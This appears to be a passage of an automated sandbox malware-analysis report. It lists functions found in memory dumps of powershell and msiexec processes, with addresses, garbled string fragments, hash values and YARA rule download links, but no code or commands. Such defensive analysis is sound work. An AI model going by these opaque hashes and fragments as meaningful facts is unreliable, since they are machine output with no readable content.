Opcode Fuzzy Hash: dd0b75527b0fff590d91b04c2ce749c0c2db6591519097587799714b5a43bfa4
Instruction Fuzzy Hash: B03199B67203438FCB305A7484122FAB79ADBD1381F448466E90ACB291DB39E802C7E1

Function 09010B71 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e43676890ec97ac7ae4c83c4fb3ff74e1ec00de7b8dfc85c0f1f0dafb46a4d
Instruction ID: 61273b4b1846348053c5aa16af94e379c78a93880a4b201e1c7d3fbee188a14b
Opcode Fuzzy Hash: 57e43676890ec97ac7ae4c83c4fb3ff74e1ec00de7b8dfc85c0f1f0dafb46a4d
Instruction Fuzzy Hash: 5F313A74A006099FCB15CF98C9909AAFBF2FF49310B258699D459EB3A1C331EC91CB90

Function 0901076B Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11242c472d6e4259f9ea039b9daa4e3ab771a3715b6cdffacbd29f2033e21bd8
Instruction ID: 8689bfe1d12f7bca17ba71f456b85fdf5bd462810e962d31ddc682e0b2331cb0
Opcode Fuzzy Hash: 11242c472d6e4259f9ea039b9daa4e3ab771a3715b6cdffacbd29f2033e21bd8
Instruction Fuzzy Hash: D9119A2191E3C45FD7035768A8606DA3FB8AF83260F0A40EBC4C0CB1A3D628884DC7A6

Function 09010F94 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2422800560.0000000009010000.00000040.00000800.00020000.00000000.sdmp, Offset: 09010000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9010000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40bad317a6b0d24a812fb75a1ece32fc4b0c00e40ac0d32de6ac4a52587106a
Instruction ID: 30bf12cb2e9edc76f44de160dfca9bf4a6fdfa478e347cd5c6d2a1424f00d9e3
Opcode Fuzzy Hash: a40bad317a6b0d24a812fb75a1ece32fc4b0c00e40ac0d32de6ac4a52587106a
Instruction Fuzzy Hash: BF11E934A04209EFDB45CF98D484E9DBBB2FF88314F288559E445AB365C775E982CB40

Function 072B21A1 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bdbf69640976f52aadb66b7970ac790b63ecb5575ef46c2d36dcc487b69e3ac
Instruction ID: 4aadc28378b4b917991ecd5c277b7ab4df9f9b7cf6b4581987a07f6b36603700
Opcode Fuzzy Hash: 0bdbf69640976f52aadb66b7970ac790b63ecb5575ef46c2d36dcc487b69e3ac
Instruction Fuzzy Hash: E0014E72F7426187C33222780C135AE6793DBD1795B0108B6DE015F287DA695E1287E3

Non-executed Functions

Function 072BF835 Relevance: 19.1, Strings: 15, Instructions: 304COMMON

Download Yara Rule

Strings

84;l, xrefs: 072BF918
4'jq, xrefs: 072BFB34
$jq, xrefs: 072BF88D
84;l, xrefs: 072BFA14
(pq, xrefs: 072BFAC5
4'jq, xrefs: 072BFB40
(pq, xrefs: 072BFA90
(pq, xrefs: 072BFA86
tPjq, xrefs: 072BF96D
(pq, xrefs: 072BFA22
84;l, xrefs: 072BFA0A
tPjq, xrefs: 072BFA5C
tPjq, xrefs: 072BFA68
tPjq, xrefs: 072BF961
84;l, xrefs: 072BF90E

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$84;l$84;l$84;l$84;l$tPjq$tPjq$tPjq$tPjq$$jq$(pq$(pq$(pq$(pq
API String ID: 0-2263002695
Opcode ID: 52bcd824ca126f1027fc165fc2d4539415d8a7fb231c1f9242d344aa113c5c5e
Instruction ID: 725f49ff2524590adba2c52a03b94d326028269bafdb61cc0605cb08bc11ec33
Opcode Fuzzy Hash: 52bcd824ca126f1027fc165fc2d4539415d8a7fb231c1f9242d344aa113c5c5e
Instruction Fuzzy Hash: 09B128B17202179FCB34CF69CE506AABBE6EF89350F248459D801AB391CB75DD41CBA1

Function 072BBCA2 Relevance: 16.7, Strings: 13, Instructions: 471COMMON

Download Yara Rule

Strings

x..k, xrefs: 072BC3B1
(f=l, xrefs: 072BC267
tL/k, xrefs: 072BBEB1
4'jq, xrefs: 072BC0DA
(f=l, xrefs: 072BBED1
(f=l, xrefs: 072BBFA1
-.k, xrefs: 072BC3FF
4'jq, xrefs: 072BC194
(f=l, xrefs: 072BC2CD
4'jq, xrefs: 072BC0F0
tL/k, xrefs: 072BBDBB
4'jq, xrefs: 072BC17E
(f=l, xrefs: 072BBDDB

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (f=l$(f=l$(f=l$(f=l$(f=l$4'jq$4'jq$4'jq$4'jq$tL/k$tL/k$x..k$-.k
API String ID: 0-1360042268
Opcode ID: 6d6cb9fb6f9d1d1cc407303e65f5ca67c6b6b48ddddbd9bde5c2a3183cd52dad
Instruction ID: 1d6da7c7461dfae47ecae7993c76fb4fbcfcbf3a5fa74026d00a7cf67f71661c
Opcode Fuzzy Hash: 6d6cb9fb6f9d1d1cc407303e65f5ca67c6b6b48ddddbd9bde5c2a3183cd52dad
Instruction Fuzzy Hash: C42263B4A102198FDB24DB24C991BDEBBB2EF85304F118499D9096B391CB35EE81CF91

Function 072BEFBD Relevance: 14.0, Strings: 11, Instructions: 209COMMON

Download Yara Rule

Strings

tPjq, xrefs: 072BF171
d%pq, xrefs: 072BF1DA
84;l, xrefs: 072BF129
d%pq, xrefs: 072BF1A5
4'jq, xrefs: 072BF21B
tPjq, xrefs: 072BF17D
d%pq, xrefs: 072BF137
4'jq, xrefs: 072BF20F
84;l, xrefs: 072BF11F
$jq, xrefs: 072BF058
d%pq, xrefs: 072BF19B

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$84;l$84;l$d%pq$d%pq$d%pq$d%pq$tPjq$tPjq$$jq
API String ID: 0-4177059406
Opcode ID: 4397cc4915894ea4f08755564d69070880862bd84255ada8ba11aff91bd724b0
Instruction ID: 416eaa9bd3551adc5f76ac23bcb767c2d5b85013901792c6e647f53bf0179317
Opcode Fuzzy Hash: 4397cc4915894ea4f08755564d69070880862bd84255ada8ba11aff91bd724b0
Instruction Fuzzy Hash: 917117B5B34217DFCB348F64CE506AABBE2EF85780F148869D8019B294DB35DC41C7A1

Function 072B0918 Relevance: 12.8, Strings: 10, Instructions: 324COMMON

Download Yara Rule

Strings

tPjq, xrefs: 072B0B65
$jq, xrefs: 072B0B20
4'jq, xrefs: 072B0A27
tPjq, xrefs: 072B0B71
$jq, xrefs: 072B0AFA
#-k, xrefs: 072B09E7
3l, xrefs: 072B0BCF
4'jq, xrefs: 072B0A1B
$jq, xrefs: 072B0B2C
3l, xrefs: 072B0BDD

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq$#-k$$jq$$jq$$jq$3l$3l
API String ID: 0-3469096826
Opcode ID: 09257aab06ad269d68d4beec0c8e242eb9c2a24693e0a4c9408ec8384dab0e7d
Instruction ID: cf525e9c8a0ee86b4de302b17f1fc5136d7389855231d06d75580baa0ca2b4e7
Opcode Fuzzy Hash: 09257aab06ad269d68d4beec0c8e242eb9c2a24693e0a4c9408ec8384dab0e7d
Instruction Fuzzy Hash: 40A16BB27243168FC7324B7984106FBBBA6EFC2790B14846BD645CB291DB35DD41C7A1

Function 09022B60 Relevance: 11.6, Strings: 9, Instructions: 380COMMON

Download Yara Rule

Strings

84;l, xrefs: 09022CB3
$jq, xrefs: 09023086
$jq, xrefs: 0902309E
tPjq, xrefs: 09022B91
84;l, xrefs: 09022BBB
tPjq, xrefs: 09022B9B
84;l, xrefs: 09022CA7
$jq, xrefs: 090230AA
84;l, xrefs: 09022BC5

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: 84;l$84;l$84;l$84;l$tPjq$tPjq$$jq$$jq$$jq
API String ID: 0-2610624558
Opcode ID: b08d28032a5d3a4b6b95fecf3b24ba0912c563f78c793423433670b0ac0674e6
Instruction ID: ab8fde4a35a3769f882b70842800b11b5e8b8898c64babf7eafe7c9117be5b66
Opcode Fuzzy Hash: b08d28032a5d3a4b6b95fecf3b24ba0912c563f78c793423433670b0ac0674e6
Instruction Fuzzy Hash: D8D1C6317002149FCB58DFA8C85166EBBE6FF88710F14886AE9159B390DF36DD45CBA1

Function 09023A82 Relevance: 10.3, Strings: 8, Instructions: 327COMMON

Download Yara Rule

Strings

tPjq, xrefs: 09023BBF
tPjq, xrefs: 09023BCB
84;l, xrefs: 09023C90
tPjq, xrefs: 09023CE1
tPjq, xrefs: 09023CED
84;l, xrefs: 09023C84
84;l, xrefs: 09023B6E
84;l, xrefs: 09023B62

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: 84;l$84;l$84;l$84;l$tPjq$tPjq$tPjq$tPjq
API String ID: 0-3387844957
Opcode ID: a9a3b3daf0f46ca675cdefe4aba76b84cf64a73941892d41093842a2b359f1cd
Instruction ID: b16eb75f507942748c247aa0e823274928cafc0217ae469dbac247f0f64b03ce
Opcode Fuzzy Hash: a9a3b3daf0f46ca675cdefe4aba76b84cf64a73941892d41093842a2b359f1cd
Instruction Fuzzy Hash: E5C19131B00229DFCB55DF58D55166ABBE2FF88710B258869F9059B390CB3ADC41CBA1

Function 09020435 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

84;l, xrefs: 090204C9
XRoq, xrefs: 090205B5
$jq, xrefs: 0902048D
tPjq, xrefs: 09020514
XRoq, xrefs: 090205A5
84;l, xrefs: 090204BF
XRoq, xrefs: 09020471
tPjq, xrefs: 09020520

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: 84;l$84;l$XRoq$XRoq$XRoq$tPjq$tPjq$$jq
API String ID: 0-3576435138
Opcode ID: 0156812d313e3d0d59e2d995362bda6d4f2912ff8f61387fcfa050d85d06d2d6
Instruction ID: 9d195032d5ec6ff5377da9a76a1f2e8696af2f88c12b1fe9b74bbb3c9be98b1a
Opcode Fuzzy Hash: 0156812d313e3d0d59e2d995362bda6d4f2912ff8f61387fcfa050d85d06d2d6
Instruction Fuzzy Hash: 4D612531B003249FCB159F288854A7BFBF6AF88710F24C86AE9059F295CB35DD45CBA1

Function 072B1440 Relevance: 10.2, Strings: 8, Instructions: 191COMMON

Download Yara Rule

Strings

$jq, xrefs: 072B15A7
3l, xrefs: 072B1615
$jq, xrefs: 072B15DE
tPjq, xrefs: 072B14E4
$jq, xrefs: 072B1454
3l, xrefs: 072B1623
$jq, xrefs: 072B15D2
tPjq, xrefs: 072B14F0

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$tPjq$$jq$$jq$$jq$$jq$3l$3l
API String ID: 0-3626510696
Opcode ID: 1fcfdc8578e77a0c366564ff1a027f0ddd208ab57b4ab772c545eaa6a93983bc
Instruction ID: 1956df02461ca2d547a34f663ab9bbd0352049267518bc69e9e67cc006a76a34
Opcode Fuzzy Hash: 1fcfdc8578e77a0c366564ff1a027f0ddd208ab57b4ab772c545eaa6a93983bc
Instruction Fuzzy Hash: 435171B1B2434A9FD7344A6D88607A7BBB6EFC2351F18806BD546CB291DA71C850C791

Function 072BB1B0 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$jq, xrefs: 072BB247
$jq, xrefs: 072BB203
$jq, xrefs: 072BB1E7
$jq, xrefs: 072BB237
$jq, xrefs: 072BB253
$jq, xrefs: 072BB22B

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-3356825164
Opcode ID: 3029a1047b207139eae854d038b493e1a18f2071e40511bf49a0c314ef11f5ec
Instruction ID: bb1e35a65c07e628777f9558fff2760f32b566f0e3b854da039c771226b4f5e4
Opcode Fuzzy Hash: 3029a1047b207139eae854d038b493e1a18f2071e40511bf49a0c314ef11f5ec
Instruction Fuzzy Hash: 963145F67743838FCB354AA998201FAB7A2EFD2391B14847FC8428B242DE35C845C751

Function 072BF0BE Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

tPjq, xrefs: 072BF171
d%pq, xrefs: 072BF1A5
4'jq, xrefs: 072BF20F
d%pq, xrefs: 072BF137
84;l, xrefs: 072BF11F
d%pq, xrefs: 072BF19B

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$84;l$d%pq$d%pq$d%pq$tPjq
API String ID: 0-1361575990
Opcode ID: e46329336420732c9ee706e4862750e94835bb16e0bc4bca5971bfb55099fd96
Instruction ID: 9fc730bc08e6fa0a7e2495e6c1789e9cdb2871d0a288c62674df3554d5d7316b
Opcode Fuzzy Hash: e46329336420732c9ee706e4862750e94835bb16e0bc4bca5971bfb55099fd96
Instruction Fuzzy Hash: A631A1B5B202169FCB24CF58CE51A99FBF2AB88750F259555E805AB350C672EC01CB90

Function 072BFC45 Relevance: 6.4, Strings: 5, Instructions: 194COMMON

Download Yara Rule

Strings

84;l, xrefs: 072BFCCF
tPjq, xrefs: 072BFD22
$jq, xrefs: 072BFC9D
84;l, xrefs: 072BFCD9
tPjq, xrefs: 072BFD2E

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 84;l$84;l$tPjq$tPjq$$jq
API String ID: 0-3207545373
Opcode ID: 969b8ba61ea9961aed0f66e71810b9b287d9137452cd5c0ba11243001f674ab8
Instruction ID: d8924dd2c59d6c46b774fc7e013ff09b7d608b5fa585378b4dfb7015fcc0b5be
Opcode Fuzzy Hash: 969b8ba61ea9961aed0f66e71810b9b287d9137452cd5c0ba11243001f674ab8
Instruction Fuzzy Hash: 536138717202079FC734DB68CA40AAAFBE2EF85350F64C46AD9019F255CB35DC41CBA1

Function 072B0538 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

4'jq, xrefs: 072B0626
4'jq, xrefs: 072B0632
$jq, xrefs: 072B05FD
$jq, xrefs: 072B05C4
$jq, xrefs: 072B0609

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: a58857c8c40bf4f26414f660e32dca13a0fc84b5b07cc3f2a7752bb3d8e24051
Instruction ID: 46186da11646b79f48e988986242dc0897684cbcb8491356e3d9348cfd665403
Opcode Fuzzy Hash: a58857c8c40bf4f26414f660e32dca13a0fc84b5b07cc3f2a7752bb3d8e24051
Instruction Fuzzy Hash: D14126B1B243069FCB365A3888516FF7FA6EFC5380F54806AD905CB291DB35D941C7A2

Function 072B5530 Relevance: 6.4, Strings: 5, Instructions: 131COMMON

Download Yara Rule

Strings

$jq, xrefs: 072B55CC
4'jq, xrefs: 072B561E
4'jq, xrefs: 072B562A
$jq, xrefs: 072B55C0
$jq, xrefs: 072B5567

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: b80cd99dbd81cf869a5672e6b49c79fd7388ea1c4d01409f6cf2dd21aa028037
Instruction ID: efb3d80d7ed182b3fbba44bbb9a0b0ba9ea3e58c6c506bd6eb4f65a774e86cdc
Opcode Fuzzy Hash: b80cd99dbd81cf869a5672e6b49c79fd7388ea1c4d01409f6cf2dd21aa028037
Instruction Fuzzy Hash: 18413BF6620207DFCB354E6A84801EAB7A7AF85391B28856FE8118F291DB34CD61CB51

Function 072BF315 Relevance: 6.4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

Strings

4'jq, xrefs: 072BF3D1
$jq, xrefs: 072BF36B
$jq, xrefs: 072BF3A5
4'jq, xrefs: 072BF3DD
$jq, xrefs: 072BF3B1

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq$$jq
API String ID: 0-103809679
Opcode ID: cf3a12aee93822ca3694f152ae0eac4508c94dd2d230691b848364e19bb7582d
Instruction ID: 954b7af290efd1d70cf29f09770961e95713fbff181593039f8922ae96aa61c7
Opcode Fuzzy Hash: cf3a12aee93822ca3694f152ae0eac4508c94dd2d230691b848364e19bb7582d
Instruction Fuzzy Hash: 973179B2724397CFCB354A698E506F6B7A5EFC6390B28807AC94286245DB39C409C762

Function 09021408 Relevance: 6.3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

Strings

$jq, xrefs: 0902147F
$jq, xrefs: 09021428
$jq, xrefs: 09021460
$jq, xrefs: 09021444
tPjq, xrefs: 090214C4

Memory Dump Source

Source File: 00000002.00000002.2422828811.0000000009020000.00000040.00000800.00020000.00000000.sdmp, Offset: 09020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_9020000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$$jq$$jq$$jq$$jq
API String ID: 0-2650090061
Opcode ID: 376d4ae348d0332fc47c3e2e4d94f7d56bb1be02cb5533aaca72097f7dbcff0f
Instruction ID: 2e9252d14c30e9907059af06edd6b9204cb6c3006eea7f13e2a619e6f82ea52c
Opcode Fuzzy Hash: 376d4ae348d0332fc47c3e2e4d94f7d56bb1be02cb5533aaca72097f7dbcff0f
Instruction Fuzzy Hash: FE214836608235DFCBA0CE55C940ABAB7F9EF42751B24096AFC08AB391C731DD00CBA1

Function 072BA24E Relevance: 6.3, Strings: 5, Instructions: 38COMMON

Download Yara Rule

Strings

d5-k, xrefs: 072BA25E
,S=l, xrefs: 072BA26C
4'jq, xrefs: 072BA28D
,S=l, xrefs: 072BA278
4'jq, xrefs: 072BA297

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: ,S=l$,S=l$4'jq$4'jq$d5-k
API String ID: 0-3096595000
Opcode ID: 828a9b2e8c897562a54f826abb276037a225c40e2da4947588a13dc7a746837a
Instruction ID: 035d484ea9fbaadca9319a862dec49211a1cb084b8c62feca360a05e8d21f203
Opcode Fuzzy Hash: 828a9b2e8c897562a54f826abb276037a225c40e2da4947588a13dc7a746837a
Instruction Fuzzy Hash: 00F059F6F7512B4F873445AC98106EABB69EFC5790314C067C845FB205D276CD0187D2

Function 072BE888 Relevance: 5.5, Strings: 4, Instructions: 479COMMON

Download Yara Rule

Strings

(ojq, xrefs: 072BE96E
(ojq, xrefs: 072BE97E
(ojq, xrefs: 072BECB1
(ojq, xrefs: 072BECC1

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: (ojq$(ojq$(ojq$(ojq
API String ID: 0-3475039101
Opcode ID: b9a8d9d6d229be09216950f7fc92c30f069b4b6e06ccbd5f7443b0868b8db658
Instruction ID: 7cc03df08becee6599f302532057a33e248adbf3c8fa724d1f3801b64312d7fc
Opcode Fuzzy Hash: b9a8d9d6d229be09216950f7fc92c30f069b4b6e06ccbd5f7443b0868b8db658
Instruction Fuzzy Hash: 3FF148B1B24347DFCB248F68C8507EABBA6FF81350F15C46AE5158B291CB35D944CBA1

Function 072B5DF8 Relevance: 5.3, Strings: 4, Instructions: 276COMMON

Download Yara Rule

Strings

tPjq, xrefs: 072B5F2A
84;l, xrefs: 072B5ED3
tPjq, xrefs: 072B5F36
84;l, xrefs: 072B5EDD

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 84;l$84;l$tPjq$tPjq
API String ID: 0-3144484473
Opcode ID: b65fb18b15f8fb1fa8489f16a71bf77b0fdb1bbaeb13e2e57bae2e8f12affa8f
Instruction ID: b7014141dd8b9ae24bd2a8bab3f9c21b7ee050d19534900219c65469924e6585
Opcode Fuzzy Hash: b65fb18b15f8fb1fa8489f16a71bf77b0fdb1bbaeb13e2e57bae2e8f12affa8f
Instruction Fuzzy Hash: 71914BB17202569FCB249F6AC850AABFBA6EF85350F18846AD905CF291DF31DC41C7A1

Function 072B9E88 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

,S=l, xrefs: 072B9F0D
,S=l, xrefs: 072B9F19
p5-k, xrefs: 072B9EFF
xS=l, xrefs: 072B9EDB

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: ,S=l$,S=l$p5-k$xS=l
API String ID: 0-996129870
Opcode ID: 8bf40d6c5900f01eb3fd27871b12f7b16e1d9dfda862c2c0ee6ec567f1422d74
Instruction ID: 8163816f92c323ba97ae9b582bbad102aa685028097d479b53047ad5e7a951b1
Opcode Fuzzy Hash: 8bf40d6c5900f01eb3fd27871b12f7b16e1d9dfda862c2c0ee6ec567f1422d74
Instruction Fuzzy Hash: 664159B1B283469FC730973888017A6BFF5DF86350F04846BD685CB251DA71E881CBA2

Function 072B36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$jq, xrefs: 072B36CE
$jq, xrefs: 072B36B2
$jq, xrefs: 072B36FC
$jq, xrefs: 072B3708

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq$$jq$$jq
API String ID: 0-2428501249
Opcode ID: 22572a0ed202b3682e1ad6d14abb94d0bf612a82e4aa6740dad1f0192c2823cf
Instruction ID: 182c8150c304d829eda40e49682f576d9f6f229c56b2cbc8f6c7486799a3b74e
Opcode Fuzzy Hash: 22572a0ed202b3682e1ad6d14abb94d0bf612a82e4aa6740dad1f0192c2823cf
Instruction Fuzzy Hash: 822135B23702065BDB34D92A8840BA7BBDADBC2791F24842E99058B387DD76D841C761

Function 072B0308 Relevance: 5.1, Strings: 4, Instructions: 54COMMON

Download Yara Rule

Strings

$jq, xrefs: 072B0352
4'jq, xrefs: 072B0373
4'jq, xrefs: 072B037F
$jq, xrefs: 072B035E

Memory Dump Source

Source File: 00000002.00000002.2419359097.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_72b0000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: d8d8991cf1edbcc8c9f2c37cebdc49e0e0945999548fb4bb991aa3750fa90c00
Instruction ID: 3883d2113ff55ed33dc314b28ed3a28b378fd8cc281e350e23cfe81872c883c9
Opcode Fuzzy Hash: d8d8991cf1edbcc8c9f2c37cebdc49e0e0945999548fb4bb991aa3750fa90c00
Instruction Fuzzy Hash: 0801F12166E3964FC737566819241A76FB79FC368032A00DBC441DF293DD288C098776

Analysis Process: msiexec.exePID: 3652, Parent PID: 5776COMMON

Executed Functions

Function 00395370 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

0oMp, xrefs: 003953E2
LjMp, xrefs: 00395550
PHjq, xrefs: 003955D9
LjMp, xrefs: 00395566
PHjq, xrefs: 003955C8

Memory Dump Source

Source File: 00000005.00000002.3285977148.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_390000_msiexec.jbxd

Similarity

API ID:
String ID: 0oMp$LjMp$LjMp$PHjq$PHjq
API String ID: 0-3395041758
Opcode ID: c92b99672cf41860446486b9abd71c1bc8264c0babf83c6d18256e0efc90f93c
Instruction ID: 260afdbe6a01e0b2e7ea4cd8d4cc921be1b6b3d236c7d76372fbbeb5df3dd112
Opcode Fuzzy Hash: c92b99672cf41860446486b9abd71c1bc8264c0babf83c6d18256e0efc90f93c
Instruction Fuzzy Hash: 6381D574E00618CFDB15DFAAD984A9DBBF2BF89300F15C069E809AB365DB349985CF50

Function 003929EC Relevance: 5.5, Strings: 4, Instructions: 521COMMON

Download Yara Rule

Strings

Xnq, xrefs: 00392AD8
Xnq, xrefs: 00392A9E
Xnq, xrefs: 00392BA4
Xnq, xrefs: 00392B57

Memory Dump Source

Source File: 00000005.00000002.3285977148.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_390000_msiexec.jbxd

Similarity

API ID:
String ID: Xnq$Xnq$Xnq$Xnq
API String ID: 0-1335687363
Opcode ID: 47df39f4aa460abcb16f62832bd9bd3616c9520babc701d9875a741f5383fb88
Instruction ID: dbe3a9c98f98c500f2c17cad6ff7c7d0097974573f43628d37ff7238513daf71
Opcode Fuzzy Hash: 47df39f4aa460abcb16f62832bd9bd3616c9520babc701d9875a741f5383fb88
Instruction Fuzzy Hash: B012AF719097D0CFCB639B7884682567FF5EF4B215B1708FEC4828B562E6395882CB22

Function 23EE5FD8 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3305302342.0000000023EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_23ee0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 949267907d9c3c7435a3203b3a522c0ceb91dee5b7a902963d469e22f77644ec
Instruction ID: 23c4b4aea39698d4c2db458347675432ba298104abee97f0efa0630421694e8d
Opcode Fuzzy Hash: 949267907d9c3c7435a3203b3a522c0ceb91dee5b7a902963d469e22f77644ec
Instruction Fuzzy Hash: 30E1E0B4E00218CFDB25DFA5C944B9DBBB2BF89300F2085A9D819B73A5DB355A85CF14

